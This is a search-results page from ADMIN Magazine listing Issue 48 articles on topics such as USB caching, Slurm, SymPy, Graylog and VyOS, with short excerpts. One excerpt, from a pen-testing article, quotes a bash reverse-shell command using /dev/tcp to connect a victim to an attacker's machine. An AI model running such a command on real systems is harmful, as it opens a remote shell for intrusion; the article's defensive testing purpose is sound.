Admin Magazine
 
  • News
  •  
  • Articles
  •  
  • Tech Tools
  •  
  • Subscribe
  •  
  • Archive
  •  
  • Whitepapers
  •  
  • Digisub
  •  
  • Write for Us!
  •  
  • Newsletter
  •  
  • Shop
  • DevOps
  • Cloud Computing
  • Virtualization
  • HPC
  • Linux
  • Windows
  • Security
  • Monitoring
  • Databases
  • all Topics...
Search
Login
ADMIN Magazine on Facebook
GooglePlus

Search

Refine your search
Sort order
  • Date
  • Score
Content type
  • Article (Print) (117)
  • Article (38)
  • News (2)
  • Blog post (1)
Keywords
Creation time
  • Last day
  • Last week
  • Last month
  • Last three months
  • Last year

1 2 3 4 5 6 7 ... 16 Next »

100%
Assess USB performance while exploring storage caching
13.12.2018
Home »  Archive  »  2018  »  Issue 48: Secur...  » 
Lead Image © Lucy Baldwin, 123RF.com
disk reads: 1306 MB in 3.00 seconds = 434.77 MB/sec federico@cybertron:~$ sudo hdparm -W /dev/sdb /dev/sdb: write-caching = 1 (on) federico@cybertron:~$ sudo hdparm -W 0 /dev/sdb /dev/sdb: write ... 48
97%
Resource Management with Slurm
13.12.2018
Home »  Archive  »  2018  »  Issue 48: Secur...  » 
Lead Image © Vladislav Kochelaevs, fotolia.com
in the configuration file define the node names with their configuration and a partition for the compute nodes. For this configuration file, these lines are, NodeName=slurm-node-0[0-1] Gres=gpu:2 CPUs=10 Sockets=1 ... 48
97%
Symbolic mathematics with Python's SymPy library
13.12.2018
Home »  Archive  »  2018  »  Issue 48: Secur...  » 
Lead Image © Buchachon Petthanya, 123RF.com
to explore heat conduction calculations. All the examples presented here use the Spyder 3.2.8 Python development environment (Anaconda 5.2.0) on Mint 19.0 Xfce. Because the full code is too long for a printed ... 48
96%
Exploring SQL Server on Linux
13.12.2018
Home »  Archive  »  2018  »  Issue 48: Secur...  » 
Lead Image © yewkeo, 123RF.com
_64 2/4 08 Installing : gdb-7.6.1-110.el7.x86_64 3/4 09 Installing : mssql-server-14.0.3026.27-2.x86 ... 48
96%
Improved defense through pen testing
13.12.2018
Home »  Archive  »  2018  »  Issue 48: Secur...  » 
Lead Image Photo by Simeon Jacobson on Unsplash
with Computer A (the victim system) receiving the following code: $ bash -I <& /dev/tcp/10.0.0.1/444 0<&1 that causes Computer A to connect to Computer B (the attacking system that receives the connection from ... 48
96%
Installing and operating the Graylog SIEM solution
13.12.2018
Home »  Archive  »  2018  »  Issue 48: Secur...  » 
Lead Image © Leo Blanchette, 123RF.com
], and MongoDB 3.6 [3]. If not already present, installing Java (as root or using sudo) before Elasticsearch and MongoDB is recommended: yum install java-1.8.0-openjdk-headless.x86_64 You should remain root ... 48
96%
Security risks from insufficient logging and monitoring
13.12.2018
Home »  Archive  »  2018  »  Issue 48: Secur...  » 
Photo by Ryoji Iwata on Unsplash
_Top_10-2017_%28en%29.pdf.pdf OWASP Top 10 2017: The Ten Most Critical Web Application Security Risks. Release Candidate 2: https://www.owasp.org/images/b/b0/OWASP_Top_10_2017_RC2_Final.pdf Ponemon ... 48
96%
Debugging Bash scripts automatically
13.12.2018
Home »  Archive  »  2018  »  Issue 48: Secur...  » 
Lead Image © Andre Zhak, 123RF.com
the hints that the information contained there is outdated and download the net.sourceforge.shelled-site-2.0.3.zip file. In the next step, open Eclipse and choose Help | Install new software . In the dialog ... 48
95%
Workflow-based data analysis with KNIME
13.12.2018
Home »  Archive  »  2018  »  Issue 48: Secur...  » 
Lead Image © Andrea De Martin, 123RF.com
Gateway Initiative (OSGI) technology. The latest version (version 3.7) is available at the project website [1], where you will also find other introductory materials, including blogs, videos, and sample ... 48
95%
Open source multipoint VPN with VyOS
13.12.2018
Home »  Archive  »  2018  »  Issue 48: Secur...  » 
Photo by Damon Lam on Unsplash
.1.21 # primary VPN # router site 3 2 172.16.0.8 # primary VPN # router site 4 3 10.4.1.25 # target host # in site 4 # Problem: First link broken ... 48

1 2 3 4 5 6 7 ... 16 Next »

Service

  • Article Code
  • Contact
  • Legal Notice
  • Privacy Policy
  • Glossary
    • Backup Test
© 2025 Linux New Media USA, LLC – Legal Notice